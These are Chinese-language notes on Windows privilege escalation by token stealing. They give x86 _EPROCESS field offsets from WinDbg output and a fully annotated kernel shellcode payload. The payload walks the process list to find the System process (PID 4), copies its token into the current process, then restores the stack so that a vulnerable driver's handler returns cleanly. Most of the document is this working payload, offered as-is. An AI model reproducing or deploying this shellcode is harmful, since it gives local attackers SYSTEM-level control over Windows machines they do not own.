windows 提权

1. 使用token

_EPROCESS 结构中 Token 字段的偏移,在 x86 系统中为 0xf8(见下方 dt 输出中的 +0x0f8 Token)。
各进程的 _EPROCESS 通过偏移 0xb8 处的 ActiveProcessLinks(_LIST_ENTRY)连接成双向链表;沿着该链表循环遍历,即可依次得到每个进程偏移 0xb8 处的地址(减去 0xb8 即为该 _EPROCESS 的基址)。

kd> !process 0 0 system
PROCESS 860dac78  SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 00185000  ObjectTable: 8c001bb8  HandleCount: 518.
    Image: System

kd> dt _EPROCESS 860dac78  
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS
   +0x098 ProcessLock      : _EX_PUSH_LOCK
   +0x0a0 CreateTime       : _LARGE_INTEGER 0x1d3f694`30d11160
   +0x0a8 ExitTime         : _LARGE_INTEGER 0x0
   +0x0b0 RundownProtect   : _EX_RUNDOWN_REF
   +0x0b4 UniqueProcessId  : 0x00000004 Void
   +0x0b8 ActiveProcessLinks : _LIST_ENTRY [ 0x870676d8 - 0x8416f368 ]
   +0x0c0 ProcessQuotaUsage : [2] 0
   +0x0c8 ProcessQuotaPeak : [2] 0
   +0x0d0 CommitCharge     : 0xb
   +0x0d4 QuotaBlock       : 0x841631c0 _EPROCESS_QUOTA_BLOCK
   +0x0d8 CpuQuotaBlock    : (null) 
   +0x0dc PeakVirtualSize  : 0x770000
   +0x0e0 VirtualSize      : 0x1f0000
   +0x0e4 SessionProcessLinks : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0x0ec DebugPort        : (null) 
   +0x0f0 ExceptionPortData : (null) 
   +0x0f0 ExceptionPortValue : 0
   +0x0f0 ExceptionPortState : 0y000
   +0x0f4 ObjectTable      : 0x8c001bb8 _HANDLE_TABLE
   +0x0f8 Token            : _EX_FAST_REF
   +0x0fc WorkingSetPage   : 0
   +0x100 AddressCreationLock : _EX_PUSH_LOCK
   +0x104 RotateInProgress : (null) 
   +0x108 ForkInProgress   : (null) 

SHELLCODE

		"\x60"		// pushad										; Save register state on the Stack
		"\x64\xA1\x24\x01\x00\x00"	// mov eax, fs:[KTHREAD_OFFSET]			; nt!_KPCR.PcrbData.CurrentThread
		"\x8B\x40\x50"			// mov eax, [eax + EPROCESS_OFFSET]		; nt!_KTHREAD.ApcState.Process
		"\x89\xC1"			// mov ecx, eax (Current _EPROCESS structure)	
		"\x8B\x98\xF8\x00\x00\x00"	// mov ebx, [eax + TOKEN_OFFSET]		; nt!_EPROCESS.Token
		//---[Copy System PID token]
		"\xBA\x04\x00\x00\x00"		// mov edx, 4 (SYSTEM PID)			; PID 4 -> System
		"\x8B\x80\xB8\x00\x00\x00"	// mov eax, [eax + FLINK_OFFSET] <-|		; nt!_EPROCESS.ActiveProcessLinks.Flink
		"\x2D\xB8\x00\x00\x00"		// sub eax, FLINK_OFFSET           |
		"\x39\x90\xB4\x00\x00\x00"	// cmp [eax + PID_OFFSET], edx     |		; nt!_EPROCESS.UniqueProcessId
		"\x75\xED"			// jnz                           ->|		; Loop !(PID=4)
		"\x8B\x90\xF8\x00\x00\x00"	// mov edx, [eax + TOKEN_OFFSET]		; System nt!_EPROCESS.Token
		"\x89\x91\xF8\x00\x00\x00"	// mov [ecx + TOKEN_OFFSET], edx		; Replace Current Process token
		//---[Recover]
		"\x61"				// popad										; Restore register state from the Stack		
		"\x81\xC4\x8C\x07\x00\x00"	// add esp,0x78c				; Offset of IRP on stack
		"\x8B\x3C\x24"			// mov edi,DWORD PTR [esp]			; Restore the pointer to IRP
		"\x83\xC4\x08"			// add esp,0x8					; Offset of DbgPrint string
		"\x8B\x1C\x24"			// mov ebx,DWORD PTR [esp]			; Restore the DbgPrint string
		"\x81\xC4\x34\x02\x00\x00"	// add esp,0x234				; Target frame to return
		"\x31\xC0"			// NTSTATUS -> STATUS_SUCCESS :p
		"\x5D"				// pop ebp										; Restore saved EBP
		"\xC2\x08\x00"			// ret 8										; Return cleanly
